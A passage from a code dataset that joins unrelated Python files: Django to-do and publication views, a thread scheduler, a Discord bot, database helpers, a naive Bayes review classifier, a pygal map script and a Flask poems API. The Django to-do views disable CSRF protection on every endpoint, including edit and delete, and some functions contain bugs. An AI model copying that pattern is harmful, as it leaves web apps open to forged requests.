django.views.decorators.csrf import csrf_exempt, csrf_protect\nfrom django.http import HttpResponse\n\nfrom .models import Task\nfrom .forms import TaskForm\n\n\n# Create your views here.\n\n\n\n@csrf_exempt\ndef add_task(request):\n\ttasks = Task.objects.all()\n\tif request.method == \"POST\":\n\t\tform = TaskForm(request.POST)\n\t\tif form.is_valid():\n\t\t\ttask = form.save(commit=False)\n\t\t\ttask.save()\n\t\t\ttask.update_from_db()\n\t\t\treturn redirect('details', pk=task.pk)\n\n\ttemplate = \"add.html\"\n\tform = TaskForm()\n\treturn render(request, template, {'form': form})\n\n@csrf_exempt\ndef task_details(request, pk):\n\ttasks = Task.objects.all()\n\ttemplate = \"details.html\"\n\ttask = get_object_or_404(Task, pk=pk)\n\treturn render(request, template, {'task':task})\n\n@csrf_exempt\ndef task_edit(request, pk):\n\ttasks = Task.objects.all()\n\ttemplate = \"edit.html\"\n\ttask = get_object_or_404(Task, pk=pk)\n\tif request.method == \"POST\":\n\t\tform = TaskForm(request.POST, instance=task)\n\t\tif form.is_valid():\n\t\t\ttask = form.save(commit=False)\n\t\t\ttask.save()\n\t\t\t\n\t\t\treturn redirect('manage')\n\telse:\n\t\tform = TaskForm(instance=task)\n\treturn render(request, template, {'form': form})\n\n@csrf_exempt\ndef task_delete(request, pk):\n\ttasks = Task.objects.all()\n\tif request.method == \"POST\":\n\t\ttask = get_object_or_404(Task, pk=pk).delete()\n\t\treturn redirect('manage')\n\telse:\n\t\treturn HttpResponse(\"WTF!\")\n\n\n@csrf_exempt\ndef manage(request):\n\ttasks = Task.objects.all()\n\ttemplate = \"manage.html\"\n\treturn render(request, template, {'tasks':tasks})\n\n@csrf_exempt\ndef index(request):\n\ttasks = Task.objects.all()\n\ttemplate = \"todos.html\"\n\treturn render(request, template, {'tasks':tasks})\n\n","sub_path":"morningApp/todos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"56941437","text":"\"\"\"\nSchedule tasks to run at a given time.\n\"\"\"\nimport threading\nimport time\nimport datetime as dt\n\nclass TaskNode:\n def __init__(self, value):\n self.next = None\n self.value = value\n pass\n\nclass Scheduler:\n def __init__(self):\n self.head = None\n self.active = False\n self.timer = None\n pass\n\n def add_task(self, time, action):\n '''Add a task to the task-chain.\n\n Args:\n time (datetime): When the task occurs.\n action (function): Function to run when `time` is reached.\n '''\n self._handle_terminated()\n task = TaskNode({\"time\": time, \"action\": action})\n head = self.head\n if head is None: # First task is being added\n self.head = task\n else:\n node = self.head\n while node:\n isHead = node == self.head\n notTail = node.next != None\n\n afterNode = time > node.value[\"time\"]\n if notTail:\n beforeNextNode = time < node.next.value[\"time\"]\n else:\n beforeNextNode = True # allow all times at the tail\n\n if afterNode and beforeNextNode: # Add task after current node\n task.next = node.next\n node.next = task\n break\n elif isHead and not afterNode: # Add task before current node (head)\n task.next = node\n self.head = task\n node = node.next\n \n if task == self.head:\n # Timer needs to be changed\n if self.timer and self.active:\n self.timer.cancel()\n self._wait_for_head()\n\n def _wrap_action(self, action):\n def wrapped():\n action()\n # Forget completed task\n self.head = self.head.next\n if self.active:\n self._wait_for_head()\n return wrapped\n\n def _wait_for_head(self):\n task = self.head\n if task:\n interval = (task.value[\"time\"] - dt.datetime.now()).total_seconds()\n # NOTE: Negative intervals execute instantly and are allowed in threading.Timer()\n self.timer = threading.Timer(interval, self._wrap_action(task.value[\"action\"]))\n self.timer.start()\n\n def start(self, auto_stop=False):\n '''Start the scheduler.\n\n Args:\n auto_stop(bool): Whether the scheduler should stop when no tasks are scheduled.\n '''\n self._handle_terminated()\n self.resume()\n if auto_stop is False:\n # Add daemon to keep scheduler alive\n self.daemon = threading.Timer(1 * 24 * 60 * 60, lambda: print(\"Exiting\"))\n\n def terminate(self):\n '''Stop the scheduler.\n\n Detaches the head and marks scheduler as terminated.\n '''\n self._handle_terminated()\n self.pause()\n self.daemon.cancel()\n self.active = \"TERMINATED\"\n\n def _handle_terminated(self):\n if self.active == \"TERMINATED\":\n raise Exception(\"Can not use terminated scheduler.\")\n\n def pause(self, timeToLast=-1):\n '''Pause the scheduler.\n\n Args:\n timeToLast(float, optional): Number of seconds to pause the scheduler for.\n\n Note that the scheduler's activity is reverted, not toggled.\n '''\n self._handle_terminated()\n self.active = False\n if timeToLast>=0:\n if self.timer:\n self.timer.cancel()\n threading.Timer(timeToLast, lambda: self.resume())\n \n def resume(self, timeToLast=-1):\n '''Resume the scheduler.\n\n Args:\n timeToLast(float, optional): Number of seconds to resume the scheduler for.\n \n Note that the scheduler's activity is reverted, not toggled.\n '''\n self._handle_terminated()\n self.active = True\n self._wait_for_head()\n if timeToLast>=0:\n threading.Timer(timeToLast, lambda: self.pause())","sub_path":"src/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":4084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"614938389","text":"import discord\nfrom discord.ext import commands\nfrom discord.utils import get\nimport logging\nimport os\nimport asyncio\nfrom itertools import cycle\nimport youtube_dl\nimport shutil\nplayers={}\n\n#Add token.txt to the working directory with your Bot Token\n#Add youtube_api.txt with your API key\n\nf = open('token.txt', 'r')\nTOKEN = f.read().replace('\\n', '')\nlogger = logging.getLogger('discord')\nlogger.setLevel(logging.DEBUG)\nhandler = logging.FileHandler(filename='discord.log', encoding='utf-8', mode='w')\nhandler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s'))\nlogger.addHandler(handler)\nclient = commands.Bot(command_prefix=\"!\")\nclient.remove_command('help')\n\n@client.event\nasync def on_ready():\n print('We have logged in as {0.user}'.format(client))\n@client.event\nasync def on_member_join(member):\n\trole=discord.utils.get(member.guild.roles,name=\"Hero\")\n\tawait member.add_roles(role)\n@client.command()\nasync def ping(message):\n\tawait message.channel.send(\"Pong!\")\n@client.command()\nasync def clean(ctx,amount=100):\n\tmessages=[]\n\tchannel=ctx.channel\n\tasync for message in channel.history(limit=int(amount)):\n\t\tmessages.append(message)\n\tawait channel.delete_messages(messages)\n\tawait channel.send('Messages Deleted!')\n@client.command()\nasync def help(ctx):\n\tauthor=ctx.author\n\tembed=discord.Embed(\n\tdescription=\"Here' some Help\",\n\tcolour=discord.Colour.blue()\n\t)\n\tembed.set_author(name='help')\n\tembed.add_field(name=\"!ping \",value=\"Returns pong\",inline=False)\n\tembed.add_field(name=\"!clean \",value=\"Clean messages Usage:!clean no._of_messages,default-100\",inline=False)\n\tembed.add_field(name=\"!play\",value=\"Play with !play songname \",inline=False)\n\tembed.add_field(name=\"!pause\",value=\"pauses the music\",inline=False)\n\tembed.add_field(name=\"!resume\",value=\"resumes the music\",inline=False)\n\tembed.add_field(name=\"!stop\",value=\"stops the music\",inline=False)\n\tembed.add_field(name=\"!next\",value=\"Plays next song in queue.\",inline=False)\n\tembed.add_field(name=\"!queue\",value=\"Queues a song. Use !queue Song_name\",inline=False)\n\tembed.add_field(name=\"!kick\",value=\"Kicks a member. Use !kick member_name\",inline=False)\n\tembed.add_field(name=\"!ban\",value=\"Bans a member. Use !ban member_name\",inline=False)\n\tembed.add_field(name=\"!unban\",value=\"Unbans a member. Use !unban member_name(with discriminator) Eg:Nishant#4324\",inline=False)\n\n\tawait ctx.channel.send(author,embed=embed)\n@client.event\nasync def on_reaction_add(reaction,user):\n\tchannel=reaction.message.channel\n\tawait channel.send('{} has added {} to the message {}'.format(user.name,reaction.emoji,reaction.message.content))\n@client.command()\n@commands.has_role('admin')\nasync def kick(ctx,member: discord.Member,*,reason=\"none\"):\n\tawait member.kick(reason=reason)\n\tawait ctx.send(f\"Kicked!{user.mention}\")\n@client.command()\n@commands.has_role('admin')\nasync def ban(ctx,member : discord.Member,*,reason=\"none\"):\n\tawait member.ban(reason=reason)\n\tawait ctx.send(f\"Banned! {user.mention}\")\n@client.command()\n@commands.has_role('admin')\n#we need user#123 member format as they are not in server\nasync def unban(ctx,*,member): \t\t\t\t\t\t\n\tbanned_users= await ctx.guild.bans()\n\tmember_name,member_discriminator=member.split('#')\n\tfor ban_entry in banned_users:\n\t\tuser=ban_entry.user\n\t\tif(user.name,user.discriminator)==(member_name,member_discriminator):\n\t\t\tawait ctx.guild.unban(user)\n\t\t\tawait ctx.send(f\"Unbanned {user.mention}\")\n\t\t\treturn\n#load the cogs in the working directory\nfor filename in os.listdir(\"./\"):\n\tif filename.endswith(\".py\") and filename!=\"bot.py\":\n\t\tclient.load_extension(f\"{filename[:-3]}\")\nclient.run(TOKEN)","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"44500950","text":"import os\n# from uniback.dictionary.uniback_constants import Repository as Rep\nfrom uniback.models.general import Repository\nfrom uniback.tools.local_session import LocalSession\n\n\ndef init_repository(engine, name):\n with LocalSession() as session:\n pass \n \n\ndef add_repository(info):\n with LocalSession() as session:\n repository = Repository(\n name=info['name'],\n description=info.get('description'),\n data=info['data'],\n engine=info['engine'],\n physical_location_id=info['physical_location_id']\n )\n session.add(repository)\n session.commit()\n\n\ndef delete_repositories(ids):\n with LocalSession() as session:\n for id in ids:\n session.query(Repository).filter_by(id=id).delete()\n session.commit()\n\n\ndef get_engine_repositories(engine_name):\n repository_list = []\n with LocalSession() as session:\n repositories = session.query(Repository).filter_by(engine=engine_name)\n for repository in repositories:\n repository_list.append((repository.id, repository.name))\n return repository_list\n\n\ndef get_info(id):\n info_dict = {}\n with LocalSession() as session:\n repository = session.query(Repository).filter_by(id=id).first()\n info_dict = dict(\n name=repository.name,\n description=repository.description,\n data=repository.data,\n engine=repository.engine,\n physical_location_id=repository.physical_location_id,\n physical_location_name=repository.physical_location.name\n )\n return info_dict","sub_path":"uniback/db_interfaces/repository_list.py","file_name":"repository_list.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"513017693","text":"# 나이브 어쩌구로 구현할거임\nimport math\nimport re\n\nTEST_MODE_OFF = True # =False 하면 ./ratings_vaid.txt랑 비교대조하면서 정답률 체크함\nTEST_NAME = \"T07\" # 디버그모드에서 만들어내는 결과파일 이름 앞에 붙음.\n\nTAIL_DIC = [ # 제거할 Tail 목록\n '\\t','.', '!', ',', \"'\", '\"', '의', '이', '가', '이다','다', '를', '의', '들'\n '같은', '은', '는', '한', '진', '임', '하고', '고', '적', '인', '~', 'ㅋ'\n ] \n\ndef TailRemover(word):\n \n for tail in TAIL_DIC:\n is_tail = word[-len(tail) : ]\n if is_tail == tail and len(word) != len(tail):\n return TailRemover(word[ : -len(tail)])\n\n return word\n\ndef NownSpliter(message): # 개선필요\n ret = []\n split = message.split(\" \")\n for word in split :\n word = TailRemover(word)\n if len(word) != 0:\n ret.append(word)\n return ret\n\n# AI의 베이스가 될 도수분포표가 필요.\nclass NaiveBaisian:\n dataList = {}\n \n def __init__(self):\n self.typeCount = 1\n self.dictionary = {}\n return\n\n def DefineRating(rating):\n data = NaiveBaisian()\n NaiveBaisian.dataList[rating] = data\n return\n \n def InsertData(rating, message):\n data = NaiveBaisian.dataList[rating]\n data.typeCount += 1\n for word in NownSpliter(message):\n if word in data.dictionary :\n data.dictionary[word] += 1\n else :\n data.dictionary[word] = 1\n return\n\n def IsNeverWord(word):\n for ratingData in NaiveBaisian.dataList.values():\n if word in ratingData.dictionary :\n return False\n return True\n\n def LogProbablityWord(self, word):\n if word in self.dictionary:\n return math.log(self.dictionary[word]) - math.log(self.typeCount)\n else :\n #if NaiveBaisian.IsNeverWord(word) : # 어떤 rating에도 이 단어가 검색되지 않았다면,\n # return 0 # T02 이 단어는 분류에 영향을 주지 않는다.\n # return math.log(self.typeCount) # T05 원래비율대로 쪼갠다.\n # for rating in NaiveBaisian.dataList.keys() :\n # if self.typeCount < NaiveBaisian.dataList[rating].typeCount :\n # return -0.000000000000001\n # return +0.000000000000001\n\n return math.log( 0.4 ) - math.log(self.typeCount) # 상대에게 있다면 불리하게 판정한다.\n #T02&T05 미적용/ 서로 없다면 수집데이터가 적은 rating일 확률이 높다고 판정하는 셈.\n \n\n def LogProbablityMessage(rating, message):\n data = NaiveBaisian.dataList[rating]\n ret = 0\n for word in NownSpliter(message):\n ret += data.LogProbablityWord(word)\n return ret\n\n def FindBestRatingFor(message):\n rating_best= -1\n value_best = - math.inf\n for rating in NaiveBaisian.dataList.keys() :\n value = NaiveBaisian.LogProbablityMessage(rating, message)\n if value_best < value :\n value_best = value\n rating_best = rating\n return rating_best\n\n def DebugGetDiff(message):\n return NaiveBaisian.LogProbablityMessage(0,message) - NaiveBaisian.LogProbablityMessage(1,message)\n\n\ndef floatForm(f):\n if f >= 0 :\n return \"+%.5f\" % f\n else :\n return \"%.5f\" % f\n\ndef main():\n NaiveBaisian.DefineRating(0)\n NaiveBaisian.DefineRating(1)\n print(\"Train data from ./ratings_train.txt\")\n ##==============================================================##\n ## TRAINING ##\n ##==============================================================##\n file = open('ratings_train.txt', 'r', encoding='UTF8')\n lines = file.readlines()\n del lines[0] # 첫줄 제거\n count = 0\n for data in lines:\n rating = int(data[-2:-1])\n data = data.partition('\\t')[2][:-3] # 처음에 나오는 id 제거, 맨 뒤의 tab, rating, enter 제거\n NaiveBaisian.InsertData(rating, data)\n\n count += 1\n if count % 30000 == 0:\n print(\"training... \" + str(count))\n\n file.close()\n \n\n\n ##==============================================================##\n ## ACTION ##\n ##==============================================================## \n if TEST_MODE_OFF :\n print(\"Get problems from ./ratings_test.txt to Write result on ./ratings_result.txt\")\n\n fread = open('ratings_test.txt' , 'r', encoding='UTF8')\n fwrite = open('ratings_result.txt', 'w', encoding='UTF8')\n \n lines = fread.readlines()\n write_msg = lines[0]\n del lines[0] # 첫줄 제거\n for data in lines:\n id = data.partition('\\t')[0]\n data = data.partition('\\t')[2][:-2] # 처음에 나오는 id 제거, 맨 뒤의 rating 제거\n \n rated = NaiveBaisian.FindBestRatingFor(data)\n write_msg += (id + \"\\t\" + data + \"\\t\" + str(rated) + \"\\n\")\n\n \n fwrite.write(write_msg)\n fwrite.close()\n fread .close()\n \n print(\"Classification finished. result saved\")\n\n return\n ##==============================================================##\n ## ACTION for TEST ##\n ## (DISABLED) ##\n ##==============================================================## \n\n print(\"Get problems from ./ratings_valid.txt to get accuracy\")\n\n success = 0;\n fail = 0;\n failed_messages = \"\"\n file = open('ratings_valid.txt', 'r', encoding='UTF8')\n lines = file.readlines()\n del lines[0] # 첫줄 제거\n for data in lines:\n rating = int(data[-2:-1])\n data = data.partition('\\t')[2][:-2] # 처음에 나오는 id 제거, 맨 뒤의 rating 제거\n \n rated = NaiveBaisian.FindBestRatingFor(data)\n if rating == rated :\n success += 1\n elif rating + rated == 1 :\n fail += 1\n\n gap = NaiveBaisian.DebugGetDiff(data)\n failed = str(1-rating) + \" \" + floatForm(gap) + \" \" + data + \"\\n\"\n failed_messages += failed\n \n\n file.close()\n\n total = success + fail\n print(TEST_NAME + \" TEST RESULT ----------------\")\n print(\"total : \" + str(total))\n print(\"success : \" + str(success) + \"\\t\" + str(100*success/total) + \"%\")\n\n\n\n \n ##==============================================================##\n ## PUT FAILED MESSAGE & LEARNING DATA ON FILE ##\n ##==============================================================##\n file = open(TEST_NAME + \"_Fail\" + str(fail) + \".txt\", 'w', encoding='UTF8')\n file.write(\"fail 비율 : \" + str(100 * fail/total) + \"%\\n\")\n for tail in TAIL_DIC :\n file.write( tail + \", \")\n file.write(\"\\n\")\n file.write(failed_messages)\n file.close()\n\n for rating in range(2) :\n writeStr = \"rate\" + str(rating) + \" 총 input:\" + str( NaiveBaisian.dataList[rating].typeCount )+ \"\\n\"\n dic = NaiveBaisian.dataList[rating].dictionary\n sorted_by_value = reversed(sorted(dic.items(), key=lambda kv: kv[1])) ## 이거 뭔코든지 나도 몰라양. 많이 나온 순서대로 정렬해줘양!\n\n\n for tuple in sorted_by_value :\n writeStr += str(tuple[1]) + \"\\t\" + str(tuple[0]) +\"\\n\" # 단어 나온 횟수 + 단어\n\n file = open(TEST_NAME + \"_DicRate\" + str(rating) + \".txt\", 'w', encoding='UTF8')\n file.write(writeStr)\n file.close()\n \nmain()\n\n\n\n\n\n\n\n","sub_path":"과목별학교과제/Algorithm/3_2_NaiveBasianClassifier/NaiveBasian.py","file_name":"NaiveBasian.py","file_ext":"py","file_size_in_byte":8165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"436127140","text":"from django.shortcuts import HttpResponse\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.core.exceptions import ValidationError\n\nfrom publications.models import Publication\nfrom publications.utils import json_response\nfrom publications import constants\n\n@csrf_protect\ndef get_publications(request):\n '''\n args:\n page is required\n fromDate is not required\n toDate is not required\n request example:\n http://127.0.0.1:8000/publications/get_publications/?page=1&fromDate=2017-06-18\n '''\n\n page_number = request.GET.get('page')\n fromDate = request.GET.get('fromDate')\n toDate = request.GET.get('toDate')\n\n if not page_number:\n return json_response({ 'error': 'You must pass page number as an argument' })\n\n publications = Publication.objects.all()\n\n if fromDate:\n try:\n publications = publications.filter(date__gte=fromDate)\n except ValidationError as error:\n return json_response({ 'error': str(error) })\n\n if toDate:\n try:\n publications = publications.filter(date__lte=toDate)\n except ValidationError as error:\n return json_response({ 'error': str(error) })\n\n\n start = (int(page_number) - 1) * constants.PAGE_SIZE\n end = int(page_number) * constants.PAGE_SIZE\n\n context = {\n 'publications': list(publications.values('title', 'content', 'date'))[start:end]\n }\n\n\n return json_response(context)\n","sub_path":"publications/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"376986667","text":"import csv\n\nimport help_functions as hp\nfrom country_codes import get_country_code\n\nfrom pygal.maps.world import World\nfrom pygal.style import LightColorizedStyle as LCS , RotateStyle as RS\n\nfilename = input(\"Enter the name of csv data file: \")\nyear = input(\"Enter the year from which you want your data to be processed: \")\ndata_dict = {}\ntry:\n with open('data/' + filename) as file:\n reader = csv.reader(file)\n index = hp.find_year(reader, year)\n for row in reader:\n country_name = row[0]\n death_rate = row[index]\n country_code = get_country_code(country_name)\n if country_code and death_rate:\n data_dict[country_code] = int(float(death_rate)) \nexcept FileNotFoundError:\n print(\"ERROR incorrect file name : \" + filename)\n \n#DIVISION INTO THREE GROUPS \nlow, average, high = {}, {}, {}\nfor country, deaths in data_dict.items():\n if deaths < 10:\n low[country] = deaths\n if deaths >10 and deaths < 20:\n average[country] = deaths\n if deaths >20:\n high[country] = deaths\n \n#CREATING CHART\nwm_style = RS('#cd823f', base_style=LCS)\nwm = World(style = wm_style)\nwm.force_uri_protocol = 'http'\nwm.title = 'Death rate per 1000 people in ' + year\nwm.add(\"Less than 10 people\", low)\nwm.add(\"More than 10 people and less than 20\", average)\nwm.add(\"20 and more\", high)\nsave_filename = input(\"Enter new name of the chart: \")\nwm.render_to_file('output/' + save_filename)\n","sub_path":"death_rate_world.py","file_name":"death_rate_world.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"650684335","text":"import datetime\r\nimport os\r\nimport time\r\nimport logging\r\n\r\nfrom bots import *\r\nfrom service import UsersService, ClipsService\r\nfrom type import PublishTo\r\nfrom api import YoutubeApi\r\n\r\nif os.getenv(\"env\") != \"prod\":\r\n logger = logging.getLogger('peewee')\r\n logger.addHandler(logging.StreamHandler())\r\n logger.setLevel(logging.DEBUG)\r\n\r\n# TODO: 非同期で一度にAPIを叩く回数。一瞬で5回APIを叩くことになるが、これが多いのか少ないのか。相手への負荷はどれくらいなのか...\r\nMAX_WORKERS = 5\r\nTIME_SLEEP = 2\r\nTIMING = 30\r\n\r\n\r\nuser_service = UsersService()\r\nclip_service = ClipsService()\r\n\r\n\r\ndef job(datum):\r\n \"\"\"APIを叩き、通知を送信する\"\"\"\r\n youtube = YoutubeApi()\r\n clips = None\r\n try:\r\n clips = youtube.search(datum)\r\n except Exception as e:\r\n print(e)\r\n\r\n if clips:\r\n data_source = to_clips_model(clips, datum[\"user\"])\r\n bot = datum.get(\"bot\")\r\n try:\r\n clip_service.bulk_insert(data_source)\r\n bot.send_message(query=datum.get(\"query\"), num=len(data_source))\r\n except Exception as e:\r\n # TODO: 適切なignore処理を\r\n print(e)\r\n\r\n # 各並列処理間で1秒待機する\r\n time.sleep(TIME_SLEEP)\r\n\r\n\r\ndef main():\r\n \"\"\"現在時刻の前後30分以内のpublish_timingを持つユーザーを取得する\"\"\"\r\n users = []\r\n waiting_users = user_service.find_publish_timing_between(timing=TIMING)\r\n for user in waiting_users:\r\n datum = {}\r\n publish_to = user.publish_to # 通知の送信先\r\n # botの選択\r\n if publish_to == PublishTo.SLACK.value:\r\n bot = SlackBot()\r\n elif publish_to == PublishTo.LINE.value:\r\n bot = LineBot()\r\n elif publish_to == PublishTo.EMAIL.value:\r\n bot = EmailBot(user.email)\r\n elif publish_to == PublishTo.FACEBOOK.value:\r\n bot = FacebookBot()\r\n elif publish_to == PublishTo.TWITTER.value:\r\n bot = TwitterBot()\r\n elif publish_to == PublishTo.DISCORD.value:\r\n bot = DiscordBot()\r\n else:\r\n bot = EmailBot(user.email)\r\n\r\n queries = list(user.queries)\r\n datum[\"last_published_at\"] = user.last_published_at\r\n datum[\"query\"] = queries[0].query if len(queries) > 0 else None\r\n datum[\"bot\"] = bot\r\n datum[\"user\"] = user\r\n\r\n try:\r\n job(datum)\r\n user.last_published_at = datetime.datetime.now()\r\n except Exception as e:\r\n print(e)\r\n users.append(user)\r\n # 正常に通知が送れたら、last_published_atとupdated_atを更新する\r\n user_service.bulk_update(users)\r\n\r\n\r\ndef to_clips_model(clips, user):\r\n if not clips:\r\n return\r\n \"\"\"APIから取得した動画情報をClipsの辞書に変換する\"\"\"\r\n data_source = []\r\n for clip in clips:\r\n data = {\r\n \"clip_id\": clip[\"clip_id\"],\r\n \"user\": user,\r\n \"clip_title\": clip[\"clip_title\"],\r\n \"channel_id\": clip[\"channel_id\"],\r\n \"channel_title\": clip[\"channel_title\"],\r\n \"published_at\": clip[\"published_at\"],\r\n \"thumbnail_url\": clip[\"thumbnail\"],\r\n \"is_visited\": False,\r\n \"created_at\": datetime.datetime.now(),\r\n \"updated_at\": datetime.datetime.now(),\r\n }\r\n\r\n data_source.append(data)\r\n\r\n return data_source\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"31008909","text":"\"\"\"Shared constants for validation\"\"\"\n\nfrom pydantic import BaseModel\n\n\nclass MinMax(BaseModel):\n minimum: float\n maximum: float\n\n def contains(self, x: float) -> bool:\n return x > self.minimum and x < self.maximum\n\n\nclass BoundingBox(BaseModel):\n latitude: MinMax\n longitude: MinMax\n\n\nBOUNDING_BOX = BoundingBox(\n latitude=MinMax(\n minimum=-14.549,\n maximum=71.367,\n ),\n longitude=MinMax(\n minimum=-179.779,\n maximum=0.0,\n ),\n)\n","sub_path":"vaccine_feed_ingest/utils/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"44712850","text":"from typing import Iterator, List, Set, Tuple\n\nfrom parallelpipe import Stage, stage\n\nfrom gfw_pixetl import get_module_logger\nfrom gfw_pixetl.layers import RasterSrcLayer\nfrom gfw_pixetl.pipes import Pipe\nfrom gfw_pixetl.settings.globals import GLOBALS\nfrom gfw_pixetl.tiles import RasterSrcTile, Tile\n\nLOGGER = get_module_logger(__name__)\n\n\nclass RasterPipe(Pipe):\n def get_grid_tiles(self) -> Set[RasterSrcTile]: # type: ignore\n \"\"\"Seed all available tiles within given grid.\n\n Use 1x1 degree tiles covering all land area as starting point.\n Then see in which target grid cell it would fall. Remove\n duplicated grid cells.\n \"\"\"\n\n tiles: Set[RasterSrcTile] = set()\n for tile_id in self.grid.get_tile_ids():\n tiles.add(self._get_grid_tile(tile_id))\n\n # tile_ids = self.grid.get_tile_ids()\n #\n # with get_context(\"spawn\").Pool(processes=GLOBALS.num_processes) as pool:\n # tiles: Set[RasterSrcTile] = set(pool.map(self._get_grid_tile, tile_ids))\n\n tile_count: int = len(tiles)\n LOGGER.info(f\"Found {tile_count} tile(s) inside grid\")\n\n return tiles\n\n def _get_grid_tile(self, tile_id: str) -> RasterSrcTile:\n assert isinstance(self.layer, RasterSrcLayer)\n return RasterSrcTile(tile_id=tile_id, grid=self.grid, layer=self.layer)\n\n def create_tiles(\n self, overwrite: bool\n ) -> Tuple[List[Tile], List[Tile], List[Tile], List[Tile]]:\n \"\"\"Raster Pipe.\"\"\"\n\n LOGGER.info(\"Start Raster Pipe\")\n\n tiles = self.collect_tiles(overwrite=overwrite)\n\n GLOBALS.workers = max(self.tiles_to_process, 1)\n\n pipe = (\n tiles\n | Stage(self.transform).setup(workers=GLOBALS.workers)\n | self.upload_file\n | self.delete_work_dir\n )\n\n tiles, skipped_tiles, failed_tiles, existing_tiles = self._process_pipe(pipe)\n\n LOGGER.info(\"Finished Raster Pipe\")\n return tiles, skipped_tiles, failed_tiles, existing_tiles\n\n @staticmethod\n @stage(workers=GLOBALS.num_processes)\n def filter_src_tiles(tiles: Iterator[RasterSrcTile]) -> Iterator[RasterSrcTile]:\n \"\"\"Only process tiles which intersect with source raster.\"\"\"\n for tile in tiles:\n if tile.status == \"pending\" and not tile.within():\n LOGGER.info(\n f\"Tile {tile.tile_id} does not intersect with source raster - skip\"\n )\n tile.status = \"skipped (does not intersect)\"\n yield tile\n\n # We cannot use the @stage decorate here\n # but need to create a Stage instance directly in the pipe.\n # When using the decorator, number of workers get set during RasterPipe class instantiation\n # and cannot be changed afterwards anymore. The Stage class gives us more flexibility.\n @staticmethod\n def transform(tiles: Iterator[RasterSrcTile]) -> Iterator[RasterSrcTile]:\n \"\"\"Transform input raster to match new tile grid and projection.\"\"\"\n for tile in tiles:\n if tile.status == \"pending\" and not tile.transform():\n tile.status = \"skipped (has no data)\"\n LOGGER.info(f\"Tile {tile.tile_id} has no data - skip\")\n yield tile\n","sub_path":"gfw_pixetl/pipes/raster_pipe.py","file_name":"raster_pipe.py","file_ext":"py","file_size_in_byte":3271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"210353200","text":"\"\"\"\n 原地快排\n\"\"\"\n\ndef quicksort(lst, left, right):\n if left >= right:\n return\n slower=faster=left # 定义两个快慢指针\n privot=lst[right] # 中值为右端点的值,将比privot小的都移至privot左边\n while faster < right:\n if lst[faster] < privot:\n lst[faster], lst[slower] = lst[slower], lst[faster]\n slower+=1\n faster+=1\n # 循环结束后,slower停在了中值位置,此时应该把privot移至中值位置\n lst[faster], lst[slower] = lst[slower], privot\n # 对privot左右分别排序\n quicksort(lst, left, slower-1)\n quicksort(lst, slower+1, right)\n\n\n\ns = [10, 2,3,1,5,8,9, 10, 13, 10, 10]\nquicksort(s, 0, len(s)-1)\n\nprint(s)\n","sub_path":"算法/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"98103317","text":"from flask import Flask, jsonify, request, abort\r\nfrom poemsDAO import poemsDAO\r\n\r\napp = Flask(__name__, static_url_path='', static_folder='.')\r\n\r\n#curl \"http://127.0.0.1:5000/poems\"\r\n@app.route('/poems')\r\ndef getAll():\r\n #print(\"in getall\")\r\n results = poemsDAO.getAll()\r\n return jsonify(results)\r\n\r\n#curl \"http://127.0.0.1:5000/poems/2\"\r\n@app.route('/poems/')\r\ndef findById(id):\r\n foundpoems = poemsDAO.findByID(id)\r\n\r\n return jsonify(foundpoems)\r\n\r\n#curl -i -H \"Content-Type:application/json\" -X POST -d \"{\\\"Title\\\":\\\"hello\\\",\\\"Author\\\":\\\"someone\\\",\\\"Price\\\":123}\" http://127.0.0.1:5000/poems\r\n@app.route('/poems', methods=['POST'])\r\ndef create():\r\n \r\n if not request.json:\r\n abort(400)\r\n # other checking \r\n poems = {\r\n \"Title\": request.json['Title'],\r\n \"Author\": request.json['Author'],\r\n \"Price\": request.json['Price'],\r\n }\r\n values =(poems['Title'],poems['Author'],poems['Price'])\r\n newId = poemsDAO.create(values)\r\n poems['id'] = newId\r\n return jsonify(poems)\r\n\r\n#curl -i -H \"Content-Type:application/json\" -X PUT -d \"{\\\"Title\\\":\\\"hello\\\",\\\"Author\\\":\\\"someone\\\",\\\"Price\\\":123}\" http://127.0.0.1:5000/poems/1\r\n@app.route('/poems/', methods=['PUT'])\r\ndef update(id):\r\n foundpoems = poemsDAO.findByID(id)\r\n if not foundpoems:\r\n abort(404)\r\n \r\n if not request.json:\r\n abort(400)\r\n reqJson = request.json\r\n if 'Price' in reqJson and type(reqJson['Price']) is not int:\r\n abort(400)\r\n\r\n if 'Title' in reqJson:\r\n foundpoems['Title'] = reqJson['Title']\r\n if 'Author' in reqJson:\r\n foundpoems['Author'] = reqJson['Author']\r\n if 'Price' in reqJson:\r\n foundpoems['Price'] = reqJson['Price']\r\n values = (foundpoems['Title'],foundpoems['Author'],foundpoems['Price'],foundpoems['id'])\r\n poemsDAO.update(values)\r\n return jsonify(foundpoems)\r\n \r\n\r\n \r\n\r\n@app.route('/poems/' , methods=['DELETE'])\r\ndef 